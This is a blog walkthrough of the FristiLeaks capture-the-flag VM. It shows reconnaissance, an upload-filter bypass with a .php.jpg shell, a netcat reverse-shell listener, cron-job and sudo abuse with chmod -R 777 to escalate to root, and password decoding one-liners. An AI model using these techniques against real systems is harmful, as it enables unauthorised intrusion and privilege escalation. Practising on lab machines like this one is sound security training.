5 December 2022

Pentesting Fun Stuff

following the cyber security path…

FristiLeaks

This is my second box I have on my list to work through. As I mentioned earlier, these list is comprised of old boxes, but still can form a good challenge to work up to OSCP.

Recon

Starting with a nmap scan to find out which ports are open and what public facing services are running on the system.

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods: 
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries 
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

Port 80 with a webserver running behind it. The version of the webserver is Apache 2.2.15.
Nmap has guessed that the OS is CentOS.

There are some entries in the robots.txt file, but before I investigate the website, I’m going to check the known vulnerabilities of the Apache version.

┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # searchsploit apache 2.2.15
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                           |  Path
                                                                                                                                                                         | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass                                                                                                                  | exploits/linux/remote/36663.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Webserver

The main page of the website has some names of the hackers behind Fristileaks and in the source there is a comment:

<!-- Welcome to #Fristleaks, a quick hackme VM by @Ar0xA

Goal: get UID 0 (root) and read the special flag file.
Timeframe: should be doable in 4 hours.
-->

The 3 entries in the robots.txt file all point to the same picture, which looks like a red haring. Just to be sure I check the pic for meta data or other hidden data, but I can’t find anything.

Time to run dirSearch and bruteforce the website in hope of finding more files/folders.
Nothing……very frustrating. I tried different worklists, but all come back with the same results. Only the 3 drinks. I really cracked my head, it dawned on me that the 3 drinks were a hint and the main page was the answer. There was one drink that wasn’t in any of my lists, mostly because it is a particular Dutch drink……fristi

The result was a admin portal with some comments.

<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">
<!-- 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
-->
<!-- 
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
-->

There are several ways to decode this base64 comment. As it is an encoded PNG file, I just replace the initial picture on the site with this piece of code. The result is a picture with a string of letters: keKkeKKeKKeKkEkkEk

A password? But what about the username? In the comment above there is name: eezeepz
This username combined with the password gives me access to a page with an upload posibility.
Will it let me upload anything?

Sorry, is not a valid file. Only allowed are: png,jpg,gif
Sorry, file not uploaded 

So it won’t let me upload a php file. Will it let me upload a file with the extention php.jpg?

Uploading, please wait
The file has been uploaded to /uploads

Yes, it will. Now to start up a listener and run the file from the browser.

┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # nc -lvnp 9999
listening on [any] 9999 ...

The file can be found in /fristi/uploads/shell.php.jpg

┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # nc -lvnp 9999
listening on [any] 9999 ...
connect to [192.168.50.130] from (UNKNOWN) [192.168.50.134] 47595
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 17:17:45 up  1:05,  0 users,  load average: 0.00, 0.01, 0.20
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$ 

A good place to start is the www folder and look for things I’ve missed.

sh-4.1$ cd /var/www
cd /var/www
sh-4.1$ ls -lah
ls -lah
total 28K
drwxr-xr-x.  6 root root 4.0K Nov 17  2015 .
drwxr-xr-x. 19 root root 4.0K Nov 19  2015 ..
drwxr-xr-x.  2 root root 4.0K Aug 24  2015 cgi-bin
drwxr-xr-x.  3 root root 4.0K Nov 17  2015 error
drwxr-xr-x.  7 root root 4.0K Nov 25  2015 html
drwxr-xr-x.  3 root root 4.0K Nov 17  2015 icons
-rw-r--r--   1 root root   98 Nov 17  2015 notes.txt

A file called notes.txt

sh-4.1$ cat notes.txt
cat notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.

-jerry

In the home directory of user eezeepz is a note:

sh-4.1$ cat /home/eezeepz/notes.txt
cat /home/eezeepz/notes.txt
Yo EZ,

I made it possible for you to do some automated checks, 
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my 
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The 
output goes to the file "cronresult" in /tmp/. It should 
run every minute with my account privileges.

- Jerry

Ok, so I can try and use chmod to let me read more home folders. An important note is the piece of info in the note, that it is required to use the full path. So in this case I try /usr/bin/chmod

sh-4.1$ echo "/usr/bin/chmod -R 777 /home/" > runthis
echo "/home/admin/chmod -R 777 /home/" > runthis

After a minute I check /home and it seems like it worked.

sh-4.1$ ls -lah /home
ls -lah /home
total 28K
drwxr-xr-x.  5 root      root      4.0K Nov 19  2015 .
dr-xr-xr-x. 22 root      root      4.0K May 27 16:11 ..
drwxrwxrwx.  2 admin     admin     4.0K Nov 19  2015 admin
drwx---r-x.  5 eezeepz   eezeepz    12K Nov 18  2015 eezeepz
drwx------   2 fristigod fristigod 4.0K Nov 19  2015 fristigod
sh-4.1$ ls -lah
ls -lah
total 652K
drwxrwxrwx. 2 admin     admin     4.0K Nov 19  2015 .
drwxr-xr-x. 5 root      root      4.0K Nov 19  2015 ..
-rwxrwxrwx. 1 admin     admin       18 Sep 22  2015 .bash_logout
-rwxrwxrwx. 1 admin     admin      176 Sep 22  2015 .bash_profile
-rwxrwxrwx. 1 admin     admin      124 Sep 22  2015 .bashrc
-rwxrwxrwx  1 admin     admin      45K Nov 18  2015 cat
-rwxrwxrwx  1 admin     admin      48K Nov 18  2015 chmod
-rwxrwxrwx  1 admin     admin      737 Nov 18  2015 cronjob.py
-rwxrwxrwx  1 admin     admin       21 Nov 18  2015 cryptedpass.txt
-rwxrwxrwx  1 admin     admin      258 Nov 18  2015 cryptpass.py
-rwxrwxrwx  1 admin     admin      89K Nov 18  2015 df
-rwxrwxrwx  1 admin     admin      24K Nov 18  2015 echo
-rwxrwxrwx  1 admin     admin     160K Nov 18  2015 egrep
-rwxrwxrwx  1 admin     admin     160K Nov 18  2015 grep
-rwxrwxrwx  1 admin     admin      84K Nov 18  2015 ps
-rw-r--r--  1 fristigod fristigod   25 Nov 19  2015 whoisyourgodnow.txt

A few python scripts and textfiles. Let’s look at the text file from fristigod.

sh-4.1$ cat whoisyourgodnow.txt 
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

Hmmm. What about the other text file.

sh-4.1$ cat cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq

It isn’t base64. So let’s take a look at the python scripts.

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

It starts with a strings, encode base64, reverses the string and finally rot13 encoding.
To make it readible again, I need to reverse this script. For this I can use a bash oneliner.

┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # echo mVGZ3O3omkJLmy2pcuTq | tr 'A-Za-z' 'N-ZA-Mn-za-m' | rev | base64 -d
thisisalsopw123
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # echo =RFn0AKnlMHMPIzpyuTI0ITG | tr 'A-Za-z' 'N-ZA-Mn-za-m' | rev | base64 -d
LetThereBeFristi!

Ok. Let’s see if this is a password.

sh-4.1$ python -c 'import pty;pty.spawn("/bin/sh");'
python -c 'import pty;pty.spawn("/bin/sh");'
sh-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!

bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
bash-4.1$ cd /home
cd /home
bash-4.1$ ls
ls
admin  eezeepz  fristigod
bash-4.1$ cd fristigod
cd fristigod
bash-4.1$ ls -lah
ls -lah
total 20K
drwx------  2 fristigod fristigod 4.0K Nov 19  2015 .
drwxr-xr-x. 5 root      root      4.0K Nov 19  2015 ..
-rw-r--r--  1 fristigod fristigod   18 Sep 22  2015 .bash_logout
-rw-r--r--  1 fristigod fristigod  176 Sep 22  2015 .bash_profile
-rw-r--r--  1 fristigod fristigod  124 Sep 22  2015 .bashrc

Nothing….but as we could see in /etc/passwd the home folder was located in /var/fristigod.

bash-4.1$ cd /var/fristigod
cd /var/fristigod
bash-4.1$ ls -lah
ls -lah
total 16K
drwxr-x---   3 fristigod fristigod 4.0K Nov 25  2015 .
drwxr-xr-x. 19 root      root      4.0K Nov 19  2015 ..
-rw-------   1 fristigod fristigod  864 Nov 25  2015 .bash_history
drwxrwxr-x.  2 fristigod fristigod 4.0K Nov 25  2015 .secret_admin_stuff
bash-4.1$ cd .secret_admin_stuff
cd .secret_admin_stuff
bash-4.1$ ls -lah
ls -lah
total 16K
drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25  2015 .
drwxr-x---  3 fristigod fristigod 4.0K Nov 25  2015 ..
-rwsr-sr-x  1 root      root      7.4K Nov 25  2015 doCom
bash-4.1$ file doCom
file doCom
doCom: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped

An ELF file with the SGID/SUID bit set.

bash-4.1$ ./doCom
./doCom
Nice try, but wrong user ;)

Hahaha….bummer.

bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!

Matching Defaults entries for fristigod on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ sudo -u fristi ./doCom
sudo -u fristi ./doCom
Usage: ./program_name terminal_command ...

So I can run the file as fristi.

bash-4.1$ sudo -u fristi ./doCom touch /var/fristigod/test.tmp
sudo -u fristi ./doCom touch /var/fristigod/test.tmp
bash-4.1$ ls -lah /var/fristigod
ls -lah /var/fristigod
total 16K
drwxr-x---   3 fristigod fristigod 4.0K May 27 18:31 .
drwxr-xr-x. 19 root      root      4.0K Nov 19  2015 ..
-rw-------   1 fristigod fristigod  864 Nov 25  2015 .bash_history
drwxrwxr-x.  2 fristigod fristigod 4.0K Nov 25  2015 .secret_admin_stuff
-rw-r--r--   1 root      users        0 May 27 18:31 test.tmp

Nice.

bash-4.1$ sudo -u fristi ./doCom chmod -R 777 /root
sudo -u fristi ./doCom chmod -R 777 /root
bash-4.1$ ls -lah /root
ls -lah /root
total 48K
drwxrwxrwx.  3 root root 4.0K Nov 25  2015 .
dr-xr-xr-x. 22 root root 4.0K May 27 16:11 ..
-rwxrwxrwx   1 root root 1.9K Nov 25  2015 .bash_history
-rwxrwxrwx.  1 root root   18 May 20  2009 .bash_logout
-rwxrwxrwx.  1 root root  176 May 20  2009 .bash_profile
-rwxrwxrwx.  1 root root  176 Sep 22  2004 .bashrc
drwxrwxrwx.  3 root root 4.0K Nov 25  2015 .c
-rwxrwxrwx.  1 root root  100 Sep 22  2004 .cshrc
-rwxrwxrwx.  1 root root 1.3K Nov 17  2015 .mysql_history
-rwxrwxrwx.  1 root root  129 Dec  3  2004 .tcshrc
-rwxrwxrwx.  1 root root  829 Nov 17  2015 .viminfo
-rwxrwxrwx.  1 root root  246 Nov 17  2015 fristileaks_secrets.txt
bash-4.1$ cat /root/fristileaks_secrets.txt
cat /root/fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)

Flag: Y0u_kn0w_y0u_l0ve_fr1st1

And that was the challenge. Not to difficult and really a good one to try.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.